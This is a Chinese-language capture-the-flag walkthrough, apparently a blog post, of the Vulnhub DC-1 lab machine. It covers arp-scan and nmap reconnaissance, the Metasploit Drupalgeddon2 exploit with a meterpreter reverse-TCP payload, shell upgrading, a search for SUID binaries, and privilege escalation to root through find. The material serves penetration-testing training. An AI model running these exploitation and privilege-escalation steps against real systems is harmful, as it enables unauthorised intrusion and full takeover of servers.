靶机Vulnhub:DC1

靶机和环境准备:

主机发现:

信息收集:

发现并利用漏洞

SUID提权:

总结:


靶机和环境准备:

宿主机:kaili

dc1靶机下载:DC: 1 ~ VulnHub

主机发现:

arp-scan -l

发现靶机ip地址192.168.3.76

信息收集:

nmap -A -sV 192.168.3.76

发现是靶机开启了22,80,111这三个端口,http服务上搭建cms:drupal 版本是7

发现并利用漏洞

使用工具:msfconsole

加载payload

msf6 > search drupalMatching Modules
================                                                                                #  Name                                           Disclosure Date  Rank       Check  Description-  ----                                           ---------------  ----       -----  -----------0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution                                                                                         1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection                                                                                                                2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection                                                                                                                     3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code ExecutionInteract with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_evalmsf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

设置参数并进行漏洞利用

为了方便做个回显

python -c 'import pty;pty.spawn("/bin/bash")'\;

查找flag.txt,发现有个flag4查看其内容

www-data@DC-1:/var/www$ find / | grep flag
find / | grep flag
/home/flag4
/home/flag4/.bash_logout
/home/flag4/.profile
/home/flag4/flag4.txt
/home/flag4/.bash_history
/home/flag4/.bashrc
/var/www/flag1.txt

内容如下:(似乎好像没啥用)

www-data@DC-1:/var/www$ cat /home/flag4/flag4.txt
cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy.  Or maybe it is?

SUID提权:

继续正常步骤使用,发现flag4的提示中有个find这里有root权限的也有find是不是能用find提权呢?

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
www-data@DC-1:/var/www$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
<d / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs

还真是能用find继续提权

查看最后的flag.txt

总结:

1.dc1这个靶机难度比较简单入门级别,适合新手刷,能熟悉渗透的流程
2.信息收集对整个渗透过程来说尤其重要,端口扫描和网站指纹的收集
3.msfconsole 的熟悉使用,对漏洞的查找和利用有一点的要求
4.了解suid提权的find提权的使用

玩转靶机Vulnhub:DC1(详细)相关推荐

  1. 看完这篇 教你玩转渗透测试靶机vulnhub——DC1

    Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...

  2. VulnHub DC1靶机渗透测试

    1. 说明 虚拟机环境为VM VirtualBox2. 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 攻击机:kali 攻击目标:5个fl ...

  3. 靶机DC-8(详细渗透,适合新手渗透)

    目录 靶机DC-8 (详细渗透,适合新手渗透) 0x01靶机描述 0x02环境搭建 1. 下载并导入靶机 2. 查看网络适配器 3. 启动靶机 0x03靶机渗透 一. 信息收集 1. 主机发现 2. ...

  4. 看完这篇 教你玩转渗透测试靶机vulnhub——DC9

    Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...

  5. Vulnhub靶机:DC-7渗透详细过程

    DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础 ...

  6. 看完这篇 教你玩转渗透测试靶机vulnhub——DC3

    Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...

  7. 看完这篇 教你玩转渗透测试靶机vulnhub——DC7

    Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...

  8. Vulnhub靶机:DC-3渗透详细过程

    前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试 ...

  9. 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    Vulnhub靶机My File Server: 2渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...

最新文章

  1. 【数论基础】有关素数的基础算法(内含三种筛法,低至O(N^(2/3))!)
  2. 字符串表达式求值 C#实现
  3. C#高级编程 第十五章 反射
  4. 翻译spring4.2官方文档(3)
  5. 机器学习发展历史回顾
  6. 【Feign请求头丢失问题】no suitable HttpMessageConverter found for response type
  7. mysql 同义词_在数据库mysql中存储和检索同义词的最佳方法
  8. 关于结婚照,还不如PS去~
  9. 精玉PC技术GHOSTXP_SP3纯净版V10_祥和版
  10. RichTextBox 增加行间距
  11. 你被优衣库遭到******与英特尔漏洞刷屏了吗?
  12. 河南新华计算机学校学费多少,河南新华电脑学院提前三年收费 育人还是圈钱?...
  13. 湖南工业大学教务系统爬虫(课表获取篇)
  14. ②(常识篇)、《史上最全iOS八股文面试题》2022年,金三银四我为你准备了,iOS《1000条》笔试题以及面试题(包含答案)。带面试你过关斩将,(赶紧过来背iOS八股文)
  15. Intellij IDEA安装golang插件
  16. Zabbix 整合ldap认证
  17. 施努卡:什么叫机器视觉(机器视觉的重要意义是什么)
  18. 仿B站web,APP,后台
  19. 银行交换机服务器维护,某银行客户使用第三方网管纳管华为S7706交换机后网管时断时续的问题...
  20. 浅谈 language server LSIF SARIF Babelfish Semantic Tree-sitter Kythe Glean等

热门文章

  1. 骑着大鱼吃小鱼游戏3D版源码
  2. php订单下单支付流程,小程序的下单与支付的业务流程
  3. 为什么写入ReplicatedMergeTree引擎表里的数据少了?
  4. 【Algorithm】 Reservoir Sampling Shuffle an Array
  5. 硬件设计6---什么是滞回电路
  6. c语言中mustbe()什么意思,must是什么意思
  7. Unity中显示中文属性(汉化你的Inspector)
  8. 题目:L2-031 深入虎穴 (25 分)
  9. 男生想跟女生说的30句真心话!!!!
  10. matlab中零向量,在MATLAB中的向量中的非零元素之间插入可变数量的零